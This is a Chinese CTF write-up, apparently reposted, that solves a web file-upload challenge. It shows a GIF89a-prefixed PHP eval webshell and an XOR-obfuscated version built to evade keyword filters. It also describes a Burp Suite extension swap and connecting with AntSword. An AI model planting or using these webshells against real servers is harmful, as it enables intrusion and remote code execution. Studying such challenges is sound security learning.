admin管理员组

文章数量:1435859

WEB

题目

 进去之后看到这样一句话

 ctrl+u得到提示

 

 按照提示进去看看,发现是个文件上传的链接

按照提示修改staus的值然后上传一个木马文件看看

 发现报错了,只允许上传图片文件

 把后缀改成jpg再试试看

 

 依旧报错,它不仅对后缀名有要求而且会检查文件格式是否符合图片
 

给一句话木马的开头加上图片格式进行绕过
 

 

GIF89a
 

<?php @eval($_POST["yexi"]);?>
 

还是哒咩~过滤太多函数了
 

 

利用异或的方法重新构造一句话木马
 

GIF89a
 

<?=
 

@$_++;
 

$___=("~"^"?").("~"^"-").("~"^"-").("~"^";").("~"^",").("~"^"*");//ASSERT
 

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");_POST
 

$___(${$__}[1]);//ASSERT($_POST[1])
 

?>
 

因为上传的过程中会检查文件中的关键词所以要把注释去掉,不然会报错
 

用burpsuite进行抓包,将上传的jpg文件改成php,放掉
 

 

 上传成功,可以在uploads中查看
 

 

 
 

 用蚁剑连接,注意勾选base64,连接成功
 

 

 按照提示打开index.php即可得到flag
 

 

 

                本文标签:
                WEB

                        版权声明:本文标题:WEB 内容由网友自发贡献,该文观点仅代表作者本人,
                        转载请联系作者并注明出处:http://www.betaflare.com/web/1686520290a5256.html,
                        本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。